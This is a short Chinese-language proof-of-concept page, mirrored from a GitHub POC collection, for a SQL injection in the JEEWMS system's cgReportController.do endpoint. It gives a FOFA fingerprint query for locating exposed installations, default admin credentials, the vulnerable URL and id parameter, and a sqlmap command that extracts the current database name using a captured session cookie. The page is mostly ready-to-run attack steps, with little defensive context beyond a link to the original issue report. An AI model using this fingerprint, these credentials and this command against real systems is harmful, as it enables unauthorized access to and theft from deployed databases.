mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
32 lines
830 B
Markdown
32 lines
830 B
Markdown
![]() |
# JEEWMS系统cgReportController.do存在SQL注入漏洞
|
|||
|
|
|||
|
JEEWMS系统cgReportController.do存在SQL注入漏洞
|
|||
|
|
|||
|
## fofa
|
|||
|
|
|||
|
```javascript
|
|||
|
body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"
|
|||
|
```
|
|||
|
|
|||
|
## poc
|
|||
|
|
|||
|
1. 构建 POC,登录后端捕获数据包,并替换 cookie
|
|||
|
|
|||
|
```javascript
|
|||
|
admin/llg123
|
|||
|
http://localhost:8083/jeewms/cgReportController.do?list&id=1
|
|||
|
```
|
|||
|
|
|||
|
1. 使用 SQLMAP 重现和构造执行语句
|
|||
|
|
|||
|
```javascript
|
|||
|
python sqlmap.py -u "http://localhost:8083/jeewms/cgReportController.do?list&id=1" --cookie="XXXXX" -p id --current-db
|
|||
|
```
|
|||
|
|
|||
|

|
|||
|
|
|||
|
|
|||
|
|
|||
|
## 漏洞来源
|
|||
|
|
|||
|
- [JEEWMS-cgReportController.do?List&ID 存在 SQL 注入漏洞 ·问题 #IBFTVK ·JeeWMS/JeeWMS - Gitee.com](https://gitee.com/erzhongxmu/JEEWMS/issues/IBFTVK)
|